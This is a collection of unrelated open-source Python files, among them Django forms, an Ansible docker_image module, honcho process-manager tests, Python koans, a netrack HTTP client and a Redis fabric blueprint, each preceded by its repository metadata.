"""
value = entity_properties[name]
if (name == 'status') and (entity.status != value) and value == 'active':
# in case the status of the role changes to active we flush the sidebar
# cache. Other changes will be visible after the retention time expires.
sidebar.flush(entity.user.account)
return True
def _onCreate(self, entity):
"""Flush the sidebar cache when a new active role entity has been created.
"""
if entity.status == 'active':
sidebar.flush(entity.user.account)
super(Logic, self)._onCreate(entity)
def canResign(self, entity):
"""Checks if the current entity is allowed to be resigned.
Args:
entity: a Role entity
Returns:
- None if the entity is allowed to resign.
- Error message otherwise.
"""
if self.disallow_last_resign:
# check if this is the last active role for it's scope
fields = {'scope': entity.scope,
'status': 'active'}
roles = self.getForFields(fields, limit=2)
# if this it the last one return error message
if len(roles) <= 1:
return DEF_LAST_RESIGN_ERROR_FMT
# resignation is possible
return None
def getRoleLogicsToNotifyUponNewRequest(self):
"""Returns a list with subclasses of Role Logic which should be notified
when a new request to obtain this Role arrives.
Returns:
A list w
|
ith all Role Logics to notify
"""
return []
def getSuggestedInitialProperties(self, user):
"""Suggest role properties for a given user based on its previous entries.
Args:
user: a user entity
Returns:
A dict with values for fields defined in SUGGESTED_FIELDS or an empty
dictionary if no previous roles were found.
|
"""
filter = {
'status': ['active', 'inactive'],
'user': user,
}
role = None
for role_logic in ROLE_LOGICS.values():
role = role_logic.getForFields(filter, unique=True)
if role:
break
if not role:
return {}
return dict([(field, getattr(role, field)) for field in SUGGESTED_FIELDS])
logic = Logic()
|
Jumpscale/jumpscale_portal8
|
apps/portalbase/macros/page/email/1_main.py
|
Python
|
apache-2.0
| 436
| 0.002294
|
from JumpScale.portal.macrolib import div_base
def main(j, args, params, *other_args):
return div_base.macro(j, args,
|
params, self_closing=True, tag='input',
additional_tag_params={'type': 'email',
'pattern': r"^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)+$"})
def match(j, args, params, tags, tasklet):
return
|
True
|
netrack/python-netrackclient
|
netrackclient/client.py
|
Python
|
lgpl-3.0
| 2,454
| 0
|
import sys
import json
import importlib
import http.client
import traceback
from netrackclient import broker
from netrackclient import errors
class HTTPClient(object):
def __init__(self, *args, **kwargs):
super(HTTPClient, self).__init__()
self._broker = broker.RequestBroker()
self.service_url = kwargs.get("service_url")
def _request(self):
request = self._broker.http_request()
request.add_header("Content-Type", "application/json")
request.add_header("Accept", "application/json")
return request
def get(self, uri, **kwargs):
request = self._request()
url = self.service_url + uri
response = request.get(url, **kwargs)
if response.status() != http.client.OK:
raise errors.BaseError(response.body())
return response
|
def put(self, uri, body, **kwargs):
request = self._request()
url = self.service_url + uri
body = json.dumps(body)
|
response = request.put(url, body, **kwargs)
if response.status() != http.client.OK:
raise errors.BaseError(response.body())
return response
def delete(self, uri, body, **kwargs):
request = self._request()
url = self.service_url + uri
body = json.dumps(body)
response = request.delete(url, body, **kwargs)
if response.status() != http.client.OK:
raise errors.BaseError(response.body())
return response
__version_map = {
"1": "netrackclient.netrack.v1.client:Client",
}
def get_client_class(version):
try:
class_path = __version_map[str(version)]
module_path, _, class_name = class_path.rpartition(":")
module = importlib.import_module(module_path)
return getattr(module, class_name)
except AttributeError:
msg = "Class {class_name} cannot be found ({exception}))".format(
class_name=class_name,
exception=traceback.format_exception(*sys.exc_info()))
raise errors.VersionError(msg)
except (KeyError, ValueError):
msg = "Invalid client version '{version}'. must be one of: ".format(
version=version)
msg += "{versions}".format(versions=", ".join(__version_map.keys()))
raise errors.VersionError(msg)
def Client(version="1", *args, **kwargs):
client_class = get_client_class(version)
return client_class(*args, **kwargs)
|
mcflugen/wmt-rest
|
wmt/flask/components/__init__.py
|
Python
|
mit
| 155
| 0.006452
|
from flask import current_app
from ..core import Service, db
from .models import Component
class ComponentsService(Service):
|
__model__ = Compo
|
nent
|
DarthStrom/python_koans
|
python2/koans/about_dictionaries.py
|
Python
|
mit
| 1,970
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutHashes in the Ruby Koans
#
from runner.koan import *
class AboutDictionaries(Koan):
def test_creating_dictionaries(self):
empty_dict = dict()
self.assertEqual(dict, type(empty_dict))
self.assertEqual(dict(), empty_dict)
self.assertEqual(0, len(empty_dict))
def test_dictionary_literals(self):
empty_dict = {}
self.assertEqual(dict, type(empty_dict))
babel_fish = {'one': 'uno', 'two': 'dos'}
self.assertEqual(__, len(babel_fish))
def test_accessing_dictionaries(self):
babel_fish = {'one': 'uno', 'two': 'dos'}
self.assertEqual(__, babel_fish['one'])
self.assertEqual(__, babel_fish['two'])
def test_changing_dictionaries(self):
babel_fish = {'one': 'uno', 'two': 'dos'}
babel_f
|
ish['
|
one'] = 'eins'
expected = {'two': 'dos', 'one': __}
self.assertEqual(expected, babel_fish)
def test_dictionary_is_unordered(self):
dict1 = {'one': 'uno', 'two': 'dos'}
dict2 = {'two': 'dos', 'one': 'uno'}
self.assertEqual(____, dict1 == dict2)
def test_dictionary_keys_and_values(self):
babel_fish = {'one': 'uno', 'two': 'dos'}
self.assertEqual(__, len(babel_fish.keys()))
self.assertEqual(__, len(babel_fish.values()))
self.assertEqual(__, 'one' in babel_fish.keys())
self.assertEqual(__, 'two' in babel_fish.values())
self.assertEqual(__, 'uno' in babel_fish.keys())
self.assertEqual(__, 'dos' in babel_fish.values())
def test_making_a_dictionary_from_a_sequence_of_keys(self):
cards = {}.fromkeys(
('red warrior', 'green elf', 'blue valkyrie', 'yellow dwarf',
'confused looking zebra'),
42)
self.assertEqual(__, len(cards))
self.assertEqual(__, cards['green elf'])
self.assertEqual(__, cards['yellow dwarf'])
|
gkc1000/pyscf
|
pyscf/tddft/__init__.py
|
Python
|
apache-2.0
| 660
| 0
|
#!
|
/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distrib
|
uted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyscf.tdscf import *
|
nickstenning/honcho
|
tests/test_manager.py
|
Python
|
mit
| 8,625
| 0.000116
|
import datetime
import queue
import multiprocessing
import pytest
from honcho.printer import Message
from honcho.manager import Manager
from honcho.manager import SYSTEM_PRINTER_NAME
HISTORIES = {
'one': {
'processes': {'foo': {}},
'messages': (('foo', 'start', {'pid': 123}),
('foo', 'line', b'hello, world!\n'),
('foo', 'stop', {'returncode': 0})),
},
'two': {
'processes': {'bar': {}, 'foo': {}},
'messages': (('foo', 'start', {'pid': 123}),
('bar', 'start', {'pid': 124}),
('foo', 'line', b'process one\n'),
('bar', 'line', b'process two\n'),
('foo', 'stop', {'returncode': 0}),
('bar', 'stop', {'returncode': 0})),
},
'returncode': {
'processes': {'bar': {}, 'foo': {}},
'messages': (('foo', 'start', {'pid': 123}),
('bar', 'start', {'pid': 124}),
('foo', 'stop', {'returncode': 456}),
('bar', 'stop', {'returncode': 321})),
},
'output_after_stop': {
'processes': {'bar': {}, 'foo': {}},
'messages': (('foo', 'start', {'pid': 123}),
('bar', 'start', {'pid': 124}),
('foo', 'line', b'hi from foo\n'),
('bar', 'line', b'hi from bar\n'),
('foo', 'stop', {'returncode': 0}),
('bar', 'line', b'fishmongers\n'),
('bar', 'line', b'butchers\n'),
('bar', 'stop', {'returncode': -15})),
},
}
class FakeClock(object):
def now(self):
return datetime.datetime(2012, 8, 11, 12, 42)
class FakeProcessManager(object):
def terminate(self, pid):
pass
def kill(self, pid):
pass
class FakeProcess(object):
def __init__(self, cmd, name=None, colour=None, quiet=None, env=None, cwd=None):
self.cmd = cmd
self.name = name
self.colour = colour
self.quiet = quiet
self.env = env
self.cwd = cwd
self._events = None
self._options = {}
def run(self, events=None, ignore_signals=False):
self._report('run', events_passed=events is not None)
def _report(self, type, **data):
if self._events is not None:
data.update({'type': type,
'name': self.name})
self._events.put(data)
class Harness(object):
def __init__(self, history, manager):
self.history = history
self.manager = manager
self.events_local = []
self._q = multiprocessing.Queue()
self._rc = multiprocessing.Value('i', -999)
def run(self, wait=True):
self.manager._process_ctor = self._process_ctor
for name, options in self.history['processes'].items():
self.manager.add_process(name,
options.get('command', 'test'),
options.get('quiet', False))
def _loop(rc):
self.manager.loop()
rc.value = self.manager.returncode
self._mproc = multiprocessing.Process(target=_loop, args=(self._rc,))
self._mproc.start()
for msg in self.history['messages']:
self.send_manager(*msg)
self._mproc.join()
@property
def manager_returncode(self):
if self._rc.value == -999:
return None
return self._rc.value
def send_manager(self, process_name, type, data, **kwargs):
self.manager.events.put(Message(type=type,
data=data,
time=datetime.datetime.now(),
name=p
|
rocess_name,
colour=None))
def fetch_events(self):
"""
Retrieve any pending events from the queue and put them on the local
event cache
"""
while 1:
try:
self.events_local.append(self._q.get(False))
e
|
xcept queue.Empty:
break
def find_events(self, name=None, type=None):
self.fetch_events()
results = []
for event in self.events_local:
if name is not None and event['name'] != name:
continue
if type is not None and event['type'] != type:
continue
results.append(event)
return results
def _process_ctor(self, *args, **kwargs):
options = self.history['processes'][kwargs['name']]
p = FakeProcess(*args, **kwargs)
p._events = self._q
p._options = options
return p
class FakePrinter(object):
def __init__(self, width=0):
self.width = width
self.lines_local = []
self._q = multiprocessing.Queue()
def write(self, message):
# Called in a remote thread, so just put the message on the queue.
self._q.put(message)
def fetch_lines(self):
"""
Retrieve any pending lines from the queue and put them on the local
line cache
"""
while 1:
try:
self.lines_local.append(self._q.get(False))
except queue.Empty:
break
def got_line(self, data):
return self.find_line(data) is not None
def find_line(self, data):
self.fetch_lines()
for line in self.lines_local:
if line.data == data:
return line
class TestManager(object):
@pytest.fixture(autouse=True)
def printer(self): # noqa
self.p = FakePrinter()
self.m = Manager(printer=self.p)
self.m._clock = FakeClock()
self.m._procmgr = FakeProcessManager()
def run_history(self, name, wait=True):
self.h = Harness(HISTORIES[name], self.m)
self.h.run(wait=wait)
def test_init_sets_default_printer_width(self):
assert self.p.width == len(SYSTEM_PRINTER_NAME)
def test_add_process_updates_printer_width(self):
self.m.add_process('interesting', 'ruby server.rb')
assert self.p.width == len('interesting')
def test_add_process_sets_name(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.name == 'foo'
def test_add_process_sets_cmd(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.cmd == 'ruby server.rb'
def test_add_process_sets_colour(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.colour is not None
def test_add_process_sets_unique_colours(self):
p1 = self.m.add_process('foo', 'ruby server.rb')
p2 = self.m.add_process('bar', 'python server.py')
assert p1.colour != p2.colour
def test_add_process_sets_quiet(self):
proc = self.m.add_process('foo', 'ruby server.rb', quiet=True)
assert proc.quiet
def test_add_process_name_must_be_unique(self):
self.m.add_process('foo', 'ruby server.rb')
with pytest.raises(AssertionError):
self.m.add_process('foo', 'another command')
def test_add_process_sets_cwd(self):
proc = self.m.add_process('foo', 'ruby server.rb', cwd='foo-dir')
assert proc.cwd == 'foo-dir'
def test_loop_with_empty_manager_returns_immediately(self):
self.m.loop()
def test_loop_calls_process_run(self):
self.run_history('one')
evts = self.h.find_events(type='run')
assert len(evts) == 1
assert evts[0]['name'] == 'foo'
assert evts[0]['events_passed']
def test_printer_receives_messages_in_correct_order(self):
self.run_history('one')
self.p.fetch_lines()
assert self.p.lines_local[0].data == 'foo started (pid=123)\n'
assert self.p.lines_local[1].data == b'hello, world!\n'
assert self.p.lines_local[2].data == 'foo stopped (rc=0)\n'
def test_printer_receives_lines_multi_process(self):
self.run_history('two')
l1 = self.p.find_line(b'process one\n')
l2
|
jhunkeler/hstcal
|
tests/wfc3/test_uvis_13single.py
|
Python
|
bsd-3-clause
| 864
| 0.003472
|
import subprocess
import pytest
from ..helpers import BaseWFC3
class TestUVIS13Single(BaseWFC3):
"""
Test pos UVIS2 DARK images
"""
detector = 'uvis'
def _single_raw_calib(self, rootname):
raw_file = '{}_raw.fits'.format(rootname)
# Prepare input file.
self.get_input_file(raw_file)
# Run CALWF3
subprocess.call(['calwf3.e', raw_file, '-vt'])
# Compare results
outputs = [('{}_flt.fits'.format(rootname),
'{}_flt_ref.fits'.format(rootname))]
self.compare_outputs(outputs)
# Ported from ``calwf3_uv_13``.
@pytest.mark.parametrize(
'rootname', ['iaao09l2q'])
|
# 'rootname', ['iaao09l2q', 'iaao09l3q', 'iaa
|
o11ofq', 'iaao11ogq', 'iblk57c1q'])
def test_uvis_13single(self, rootname):
self._single_raw_calib(rootname)
|
Kentoseth/rangoapp
|
tango_with_django_project/rango/forms.py
|
Python
|
mit
| 1,390
| 0.035971
|
from django import forms
from rango.models import Page, Category
from rango.models import UserProfile
from
|
django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
name = forms.CharField(max_length=128, help_text="Please enter the category name.")
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
class Meta:
# Provide an association between the ModelForm and a model
model = Category
class PageForm(forms.ModelForm):
title = forms.Ch
|
arField(max_length=128, help_text="Please enter title of the page")
url = forms.URLField(max_length=200, help_text="Please enter URL of the page")
views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
class Meta:
# Provide an association between the ModelForm and a model
model = Page
fields = ('title', 'url', 'views')
def clean(self):
cleaned_data = self.cleaned_data
url = cleaned_data.get('url')
if url and not url.startswith('http://'):
url = 'http://' + url
cleaned_data['url'] = url
return cleaned_data
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'password')
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('website', 'picture')
|
gitgitcode/myflask
|
maomew/__init__.py
|
Python
|
mit
| 219
| 0.004566
|
# !/bin/env/ python
from flask import Flask
app
|
= Flask(__name__, instance_relative_config=True)
app.config.from_object('config.default')
app.config.from_pyfile('config.py'
|
)
#app.config.from_envvar('APP_CONFIG_FILE')
|
mamchecker/mamchecker
|
mamchecker/done/__init__.py
|
Python
|
gpl-3.0
| 3,545
| 0.001975
|
# -*- coding: utf-8 -*-
import re
import datetime
import logging
from urlparse import parse_qsl
from mamchecker.model import depth_1st, problemCtxObjs, keysOmit, table_entry, ctxkey
from mamchecker.hlp import datefmt, last
from mamchecker.util import PageBase
from google.appengine.ext import ndb
def prepare(
qs # url query_string (after ?)
, skey # start key, filter is filled up with it.
# student key normally, but can be other, e.g. school, too.
# if a parent belongs to user then all children can be queried
, userkey
):
'''prepares the perameters for depth_1st
>>> #see depth_1st
>>> skey = ctxkey(['Sc1', 'Pe1', 'Te1','Cl1','St1'])
>>> #qs= "Sc0&*&*&*&*&*"
>>> qs= "q~r.be"
>>> prepare(qs,skey,None)[0]
['Sc1', 'Pe1', 'Te1', 'Cl1', 'St1', [('query_string', '=', 'r.be')]]
>>> qs= ' '
>>> prepare(qs,skey,None)[0]
['Sc1', 'Pe1', 'Te1', 'Cl1', 'St1', []]
>>> qs= "1DK&*&d>3"
>>> p = prepare(qs,skey,None)[0]
'''
@last
def filters(x):
'''convert to GAE filters from
lst is ["<field><operator><value>",...]
~ -> =
q = query_string
age fields: H = hours, S = seconds, M = minutes, d = days
'''
AGES = {'d': 'days', 'H': 'hours', 'M': 'minutes', 'S': 'seconds'}
ABBR = {'q': 'query_string'}
filters = []
if not isinstance(x, str):
return
for le in x.split(','):
#le = n
|
ext(iter(x.split(',')))
le = le.replace('~', '=')
match = re.match(r'(\w+)([=!<>]+)([\w\d\.]+)', le)
if match:
grps = match.groups()
name, op, value = grps
if name in ABBR:
name = ABBR[name]
age = None
# le='d<~3'
if name in AGES:
age = AGES[name]
if name in AGES.values():
age =
|
name
if age:
value = datetime.datetime.now(
) - datetime.timedelta(**{age: int(value)})
name = 'answered'
filters.append((name, op, value))
return filters
#qs = ''
O = problemCtxObjs
# q=query, qq=*->[], qqf=filter->gae filter (name,op,value)
q = filter(None, [k.strip() for k, v in parse_qsl(qs, True)])
qq = [[] if x == '*' else x for x in q]
qqf = [filters() if filters(x) else x for x in qq]
# fill up to len(O)
delta = len(O) - len(qqf)
if delta > 0:
ext = [str(v) for k, v in skey.pairs()]
extpart = min(len(ext), delta)
rest = delta - extpart
qqf = ext[:extpart] + [[]] * rest + qqf
keys = keysOmit(qqf)
obj = keys and keys[-1].get() # parent to start from
if obj and obj.userkey == userkey:
return qqf, keys, O, True
else:
return qqf, [], O, False, userkey
class Page(PageBase):
def __init__(self, _request):
super(self.__class__, self).__init__(_request)
self.table = lambda: depth_1st(
*
prepare(
self.request.query_string,
self.request.student.key,
self.user and self.user.key))
self.params = {
'table': self.table,
'table_entry': table_entry}
def post_response(self):
for urlsafe in self.request.get_all('deletee'):
k = ndb.Key(urlsafe=urlsafe)
k.delete()
return self.get_response()
|
ColOfAbRiX/ansible
|
lib/ansible/modules/cloud/docker/docker_image.py
|
Python
|
gpl-3.0
| 21,614
| 0.003007
|
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
module: docker_image
short_description: Manage docker images.
version_added: "1.5"
description:
- Build, load or pull an image, making the image available for creating containers. Also supports tagging an
image into a repository and archiving an image to a .tar file.
options:
archive_path:
description:
- Use with state C(present) to archive an image to a .tar file.
required: false
version_added: "2.1"
load_path:
description:
- Use with state C(present) to load an image from a .tar file.
required: false
version_added: "2.2"
dockerfile:
description:
- Use with state C(present) to provide an alternate name for the Dockerfile to use when building an image.
default: Dockerfile
required: false
version_added: "2.0"
force:
description:
- Use with state I(absent) to un-tag and remove all images matching the specified name. Use with state
C(present) to build, load or pull an image when the image already exists.
default: false
required: false
version_added: "2.1"
http_timeout:
description:
- Timeout for HTTP requests during the image build operation. Provide a positive integer value for the number of
seconds.
required: false
version_added: "2.1"
name:
description:
- "Image name. Name format will be one of: name, repository/name, registry_server:port/name.
When pushing or pulling an image the name can optionally include the tag by appending ':tag_name'."
required: true
path:
description:
- Use with state 'present' to build an image. Will be the path to a directory containing the context and
Dockerfile for building an image.
aliases:
- build_path
required: false
pull:
description:
- When building an image downloads any updates to the FROM image in Dockerfile.
default: true
required: false
version_added: "2.1"
push:
description:
- Push the image to the registry. Specify the registry as part of the I(name) or I(repository) parameter.
default: false
required: false
version_added: "2.2"
rm:
description:
- Remove intermediate containers after build.
default: true
required: false
version_added: "2.1"
nocache:
description:
- Do not use cache when building an image.
default: false
required: false
repository:
description:
- Full path to a repository. Use with state C(present) to tag the image into the repository. Expects
format I(repository:tag). If no tag is provided, will use the value of the C(tag) parameter or I(latest).
required: false
version_added: "2.1"
state:
description:
- Make assertions about the state of an image.
- When C(absent) an image will be removed. Use the force option to un-tag and remove all images
matching the provided name.
- When C(present) check if an image exists using the provided name and tag. If the image is not found or the
force option is used, the image will either be pulled, built or loaded. By default the image will be pulled
from Docker Hub. To build the image, provide a path value set to a directory containing a context and
Dockerfile. To load an image, specify load_path to provide a path to an archive file. To tag an image to a
repository, provide a repository path. If the name contains a repository path, it will be pushed.
- "NOTE: C(build) is DEPRECATED and will be removed in release 2.3. Specifying C(build) will behave the
same as C(present)."
required: false
default: present
choices:
- absent
- present
- build
tag:
descri
|
ption:
- Used to select an image when pulling. Will be added to the image when pushing, tagging or building. Defaults to
I(latest).
- If C(
|
name) parameter format is I(name:tag), then tag value from C(name) will take precedence.
default: latest
required: false
buildargs:
description:
- Provide a dictionary of C(key:value) build arguments that map to Dockerfile ARG directive.
- Docker expects the value to be a string. For convenience any non-string values will be converted to strings.
- Requires Docker API >= 1.21 and docker-py >= 1.7.0.
type: complex
required: false
version_added: "2.2"
container_limits:
description:
- A dictionary of limits applied to each container created by the build process.
required: false
version_added: "2.1"
type: complex
contains:
memory:
description: Set memory limit for build
type: int
memswap:
description: Total memory (memory + swap), -1 to disable swap
type: int
cpushares:
description: CPU shares (relative weight)
type: int
cpusetcpus:
description: CPUs in which to allow execution, e.g., "0-3", "0,1"
type: str
use_tls:
description:
- "DEPRECATED. Whether to use tls to connect to the docker server. Set to C(no) when TLS will not be used. Set to
C(encrypt) to use TLS. And set to C(verify) to use TLS and verify that the server's certificate is valid for the
server. NOTE: If you specify this option, it will set the value of the tls or tls_verify parameters."
choices:
- no
- encrypt
- verify
default: no
required: false
version_added: "2.0"
extends_documentation_fragment:
- docker
requirements:
- "python >= 2.6"
- "docker-py >= 1.7.0"
- "Docker API >= 1.20"
authors:
- Pavel Antonov (@softzilla)
- Chris Houseknecht (@chouseknecht)
- James Tanner (@jctanner)
'''
EXAMPLES = '''
- name: pull an image
docker_image:
name: pacur/centos-7
- name: Tag and push to docker hub
docker_image:
name: pacur/centos-7
repository: dcoppenhagan/myimage
tag: 7.0
push: yes
- name: Tag and push to local registry
docker_image:
name: centos
repository: localhost:5000/centos
tag: 7
push: yes
- name: Remove image
docker_image:
state: absent
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
- name: Build an image and push it to a private repo
docker_image:
path: ./sinatra
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
push: yes
- name: Archive image
docker_image:
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
archive_path: my_sinatra.tar
- name: Load image from archive and push to a private registry
docker_image:
name: localhost:5000/myimages/sinatra
tag: v1
push: yes
load_path: my_sinatra.tar
- name: Build image and with buildargs
docker_image:
path: /path/to/build/dir
name: myimage
buildargs:
log_volume: /var/log/myapp
listen_port: 8080
'''
RETURN = '''
image:
description: Image inspection results for the affected image.
returned: success
type: complex
sample: {}
'''
from ansible.module_utils.docker_common import *
try:
from docker.auth.auth import resolve_repository_name
from docker.utils.utils import parse_repository_tag
except ImportError:
# missing docker-py handled in docker_common
pass
class ImageManager(DockerBaseClass):
def __init__(self, c
|
openstack/tacker
|
tacker/common/constants.py
|
Python
|
apache-2.0
| 813
| 0
|
# Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the Lice
|
nse.
|
# TODO(salv-orlando): Verify if a single set of operational
# status constants is achievable
MAX_VLAN_TAG = 4094
MIN_VLAN_TAG = 1
PAGINATION_INFINITE = 'infinite'
SORT_DIRECTION_ASC = 'asc'
SORT_DIRECTION_DESC = 'desc'
|
tykling/tykurllog
|
src/tykurllog/admin.py
|
Python
|
bsd-3-clause
| 204
| 0.009804
|
from django.contrib import admin
from django.apps import apps
### register all models in this app in the admin
for model in apps.get_app_config('ty
|
kurllog').get_models():
admin.site.regist
|
er(model)
|
prmtl/fuel-web
|
nailgun/nailgun/test/unit/test_objects.py
|
Python
|
apache-2.0
| 27,637
| 0
|
# -*- coding: utf-8 -*-
# Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import hashlib
import jsonschema
import six
import uuid
from itertools import cycle
from itertools import ifilter
from oslo.serialization import jsonutils
from nailgun.test.base import BaseIntegrationTest
from nailgun.test.base import BaseTestCase
from nailgun.utils import reverse
from nailgun.errors import errors
from nailgun import consts
from nailgun.db import NoCacheQuery
from nailgun.db.sqlalchemy.models import NodeBondInterface
from nailgun.db.sqlalchemy.models import Task
from nailgun.network.manager import NetworkManager
from nailgun.network.neutron import NeutronManager
from nailgun.network.neutron import NeutronManager70
from nailgun import objects
class TestObjects(BaseIntegrationTest):
def test_filter_by(self):
names = cycle('ABCD')
os = cycle(['CentOS', 'Ubuntu'])
for i in xrange(12):
self.env.create_release(
name=names.next(),
operating_system=os.next()
)
# filtering query - returns query
query_filtered = objects.ReleaseCollection.filter_by(
objects.ReleaseCollection.all(),
name="A",
operating_system="CentOS"
)
self.assertIsInstance(query_filtered, NoCacheQuery)
self.assertEqual(
objects.ReleaseCollection.count(query_filtered),
3
)
for r in query_filtered:
self.assertEqual(r.name, "A")
self.assertEqual(r.operating_system, "CentOS")
# filtering iterable - returns ifilter
iterable_filtered = objects.ReleaseCollection.filter_by(
list(objects.ReleaseCollection.all()),
name="A",
operating_system="CentOS"
)
self.assertIsInstance(iterable_filtered, ifilter)
self.assertEqual(
objects.ReleaseCollection.count(iterable_filtered),
3
)
for r in iterable_filtered:
self.assertEqual(r.name, "A")
self.assertEqual(r.operating_system, "CentOS")
iterable_filtered = objects.ReleaseCollection.filter_by(
list(),
name="A",
)
self.assertIsInstance(iterable_filtered, ifilter)
self.assertEquals(0, len(list(iterable_filtered)))
def test_filter_by_not(self):
names = cycle('ABCDE')
os = cycle(['CentOS', 'Ubuntu'])
# create releases: we'll have only two releases with both
# name A and operating_system CentOS
for i in xrange(12):
self.env.create_release(
name=names.next(),
operating_system=os.next()
)
# filtering query - returns query
query_filtered = objects.ReleaseCollection.filter_by_not(
objects.ReleaseCollection.all(),
name="A",
operating_system="CentOS"
)
self.assertIsInstance(query_filtered, NoCacheQuery)
self.assertEqual(
objects.ReleaseCollection.count(query_filtered),
10
)
for r in query_filtered:
if r.name == "A":
self.assertNotEqual(r.operating_system, "CentOS")
elif r.operating_system == "CentOS":
self.assertNotEqual(r.name, "A")
# filtering iterable - returns ifilter
iterable_filtered = objects.ReleaseCollection.filter_by_not(
list(objects.ReleaseCollection.all()),
name="A",
operating_system="CentOS"
)
self.assertIsInstance(iterable_filtered, ifilter)
self.assertEqual(
objects.ReleaseCollection.count(iterable_filtered),
10
)
for r in iterable_filtered:
if r.name == "A":
self.assertNotEqual(r.operating_system, "CentOS")
elif r.operating_system == "CentOS":
self.assertNotEqual(r.name, "A")
class TestNodeObject(BaseIntegrationTest):
def test_adding_to_cluster_kernel_params_centos(self):
self.env.create(
release_kwargs={
"operating_system": consts.RELEASE_OS.centos
},
cluster_kwargs={},
nodes_kwargs=[
{"role": "controller"}
]
)
node_db = self.env.nodes[0]
self.assertEqual(
objects.Node.get_kernel_params(node_db),
(
'console=ttyS0,9600 '
'console=tty0 '
'biosdevname=0 '
'crashkernel=none '
'rootdelay=90 '
'nomodeset'
)
)
def test_adding_to_cluster_kernel_params_ubuntu(self):
self.env.create(
release_kwargs={
"operating_system": consts.RELEASE_OS.ubuntu,
"attributes_metadata": {
"editable": {
"kernel_params": {
"kernel": {
"value": (
"console=ttyS0,9600 "
"console=tty0 "
"rootdelay=90 "
"nomodeset"
)
}
}
}
}
},
cluster_kwargs={},
nodes_kwargs=[
{"role": "controller"}
]
)
node_db = self.env.nodes[0]
self.assertEqual(
objects.Node.get_kernel_params(node_db),
(
'console=ttyS0,9600 '
'console=tty0 '
'rootdelay=90 '
'nomodeset'
)
)
def test_get_kernel_params_overwriten(self):
"""Test verifies that overwriten kernel params will be returned."""
self.env.create(
nodes_kwargs=[
{"role": "controller"}
])
additional_kernel_params = 'intel_iommu=true'
default_kernel_params = objects.Cluster.get_default_kernel_params(
self.env.clusters[0])
kernel_params = '{0} {1}'.format(default_kernel_params,
additional_kernel_params)
self.env.nodes[0].kernel_params = kernel_params
self.assertNotEqual(
objects.Node.get_kernel_params(self.env.nodes[0]),
default_kernel_params)
self.assertEqual(
objects.Node.get_kernel_params(self.env.nodes[0]),
kernel_params)
def test_should_have_public(self):
nodes = [
|
{'roles': ['controller', 'cinder'], 'pending_addition': True},
{'roles': ['compute', 'cinder'], 'pending_addition': True},
{'roles
|
': ['compute'], 'pending_addition': True},
{'roles': ['mongo'], 'pending_addition': True},
{'roles': [], 'pending_roles': ['cinder'],
'pending_addition': True},
{'roles': [], 'pending_roles': ['controller'],
'pending_addition': True}]
self.env.create(
cluster_kwargs={
'net_provider': 'neutron'},
nodes_kwargs=nodes)
cluster = self.env.clusters[0]
cluster.release.roles_metadata['mongo']['public_ip_required'] = True
attrs = cluster.attributes.editable
self.assertEqual(
attrs['public_network_assignment']['assign_to_all_nodes']['value'],
|
jocke-l/blues
|
blues/redis.py
|
Python
|
mit
| 1,054
| 0.000949
|
"""
Redis Blueprint
===============
**
|
Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.redis
settings:
redis:
# bind: 0.0.0.0 # Set the bind address specifically (Default: 127.0.0.1)
"""
from fabric.decorators import task
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup',
|
'configure']
blueprint = blueprints.get(__name__)
start = debian.service_task('redis-server', 'start')
stop = debian.service_task('redis-server', 'stop')
restart = debian.service_task('redis-server', 'restart')
@task
def setup():
"""
Install and configure Redis
"""
install()
configure()
def install():
with sudo():
debian.apt_get('install', 'redis-server')
@task
def configure():
"""
Configure Redis
"""
